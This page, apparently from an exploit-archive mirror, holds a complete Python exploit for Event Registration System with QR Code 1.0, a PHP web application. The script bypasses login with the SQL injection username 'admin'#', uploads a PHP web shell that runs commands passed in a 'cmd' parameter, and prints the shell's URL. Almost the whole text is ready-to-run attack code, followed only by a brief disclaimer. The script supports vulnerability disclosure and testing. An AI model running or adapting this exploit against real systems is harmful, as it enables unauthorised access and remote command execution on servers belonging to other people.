扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 |
# Exploit Title: Event Registration System with QR Code 1.0 - Authentication Bypass & RCE # Exploit Author: Javier Olmedo # Date: 27/07/2021 # Vendor: Sourcecodester # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/event_0.zip # Affected Version: 1.0 # Category: WebApps # Platform: PHP # Tested on: Ubuntu Server & Windows 10 Pro import os, re, sys, argparse, requests from termcolor import cprint def banner(): os.system("cls") print(''' _____________ \_ _____/____ ____ _____/|_ |__)_\\/ // __ \ /\ __\\ |\\\\ /\___/| |\| /_______/ \_/\___>___|/__| \/ \/ \/ Registration System --[Authentication Bypass and RCE]-- @jjavierolmedo ''') def get_args(): parser = argparse.ArgumentParser(description='Event - Authentication Bypass and RCE Exploit') parser.add_argument('-t', '--target', dest="target", required=True, action='store', help='Target url') parser.add_argument('-p', '--proxy', dest="proxy", required=False, action='store', help='Use proxy') args = parser.parse_args() return args def auth_bypass(s, proxies, url): data = { "username":"admin'#", "password":"" } r = s.post(url, data=data, proxies=proxies) if('{"status":"success"}' in r.text): cprint("[+] Authenticacion Bypass Success!\n", "green") return s else: cprint("[-] Authenticacion Bypass Error!\n", "red") sys.exit(0) def upload_shell(s, proxies, url): content = "<?php echo '<pre>' . shell_exec($_REQUEST['cmd']) . '</pre>';?>" file = { 'img':('cmd.php',content) } data = { "name":"Event Registration System with QR Code - PHP", "short_name":"ERS-QR-PHP", } r = s.post(url, files=file, data=data, proxies=proxies) if('1' in r.text and r.status_code == 200): cprint("[+] Upload Shell Success!\n", "green") return s else: cprint("[-] Upload Shell Error!\n", "red") sys.exit(0) def get_shell_url(s, proxies, url): r = s.get(url, proxies=proxies) regex = '\_cmd.php"> (.*?)</a></li>' shell_name = re.findall(regex, r.text)[0] url_shell = "http://localhost/event/uploads/{shell_name}?cmd=whoami".format(shell_name=shell_name) cprint("[+] Use your shell --> {url_shell}\n".format(url_shell=url_shell), "green") def main(): banner() args = get_args() target = args.target proxies = {'http':'','https':''} if args.proxy: proxies = {'http':'{proxy}'.format(proxy=args.proxy),'https':'{proxy}'.format(proxy=args.proxy)} login_url = target + "/event/classes/Login.php?f=rlogin" upload_url = target + "/event/classes/SystemSettings.php?f=update_settings" shell_url = target + "/event/uploads/" s = requests.Session() s = auth_bypass(s, proxies, login_url) s = upload_shell(s, proxies, upload_url) s = get_shell_url(s, proxies, shell_url) if __name__ == "__main__": try: main() except KeyboardInterrupt: cprint("[-] User aborted session\n", "red") sys.exit(0) # Disclaimer # The information contained in this notice is provided without any guarantee of use or otherwise. # The redistribution of this notice is explicitly permitted for insertion into vulnerability # databases, provided that it is not modified and due credit is granted to the author. # The author prohibits the malicious use of the information contained herein and accepts no responsibility. # All content (c) # Javier Olmedo |
体验盒子
